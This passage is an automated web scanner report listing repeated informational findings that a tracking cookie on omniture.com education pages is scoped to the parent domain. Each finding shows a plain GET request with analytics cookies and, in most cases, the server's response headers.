Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:08:55 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:08:55 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:08:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:08:55 GMT; path=/; domain=omniture.com
Content-Length: 34032

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Partner Certification | Online
...[SNIP]...

11.366. http://www.omniture.com/en/education/certification/implementation previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/implementation

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:10:36 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/education/certification/implementation HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:10:36 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:10:36 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:10:37 GMT
Content-Length: 29450
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:10:36 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services: Certif
...[SNIP]...

11.367. http://www.omniture.com/en/education/certification/insight_analyst previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/insight_analyst

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:10:39 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/education/certification/insight_analyst HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:10:39 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:10:39 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:10:40 GMT
Content-Length: 30492
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:10:39 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services: Certif
...[SNIP]...

11.368. http://www.omniture.com/en/education/certification/insight_architect previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/insight_architect

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:10:46 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/education/certification/insight_architect HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:10:46 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:10:46 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:10:47 GMT
Content-Length: 31189
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:10:46 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services: Certif
...[SNIP]...

11.369. http://www.omniture.com/en/education/certification/search_center previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/search_center

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:11:43 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/education/certification/search_center HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:11:43 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:11:43 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:11:43 GMT
Content-Length: 28706
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:11:43 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services: Certif
...[SNIP]...

11.370. http://www.omniture.com/en/education/certification/site_catalyst previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/site_catalyst

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:11:46 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/education/certification/site_catalyst HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:11:46 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:11:46 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:11:46 GMT
Content-Length: 28706
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:11:46 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services: Certif
...[SNIP]...

11.371. http://www.omniture.com/en/education/certification/support previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/support

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:11:45 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/education/certification/support HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:11:45 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:11:45 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:11:45 GMT
Content-Length: 28545
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:11:45 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services: Certif
...[SNIP]...

11.372. http://www.omniture.com/en/education/certification/test_target previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/test_target

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:11:50 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/education/certification/test_target HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:11:50 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:11:50 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:11:50 GMT
Content-Length: 28895
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:11:50 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services: Certif
...[SNIP]...

11.373. http://www.omniture.com/en/education/courses previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:06:05 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/education/courses HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:06:05 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:06:05 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:06:05 GMT
Content-Length: 27072
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:06:05 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services | Cours
...[SNIP]...

11.374. http://www.omniture.com/en/education/courses/discover previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/discover

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:06:12 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/education/courses/discover HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:06:12 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:06:12 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:06:13 GMT
Content-Length: 28121
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:06:12 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Discover Training Courses | Web
...[SNIP]...

11.375. http://www.omniture.com/en/education/courses/dop_analyst previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/dop_analyst

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:06:19 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/education/courses/dop_analyst HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

11.376. http://www.omniture.com/en/education/courses/merchandising previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/merchandising

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:07:48 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/education/courses/merchandising HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:07:48 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:07:48 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:07:49 GMT
Content-Length: 28432
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:07:48 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Merchandising Training Courses
...[SNIP]...

11.377. http://www.omniture.com/en/education/courses/online_marketing_suite previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/online_marketing_suite

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:07:55 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/education/courses/online_marketing_suite HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

11.378. http://www.omniture.com/en/education/courses/sbu previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/sbu

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:06:11 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/education/courses/sbu HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

11.379. http://www.omniture.com/en/education/courses/searchcenter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/searchcenter

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:07:20 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/education/courses/searchcenter HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:07:20 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:07:20 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:07:20 GMT
Content-Length: 30122
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:07:20 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>SearchCenter Training Courses
...[SNIP]...

11.380. http://www.omniture.com/en/education/courses/sitesearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/sitesearch

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:08:13 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

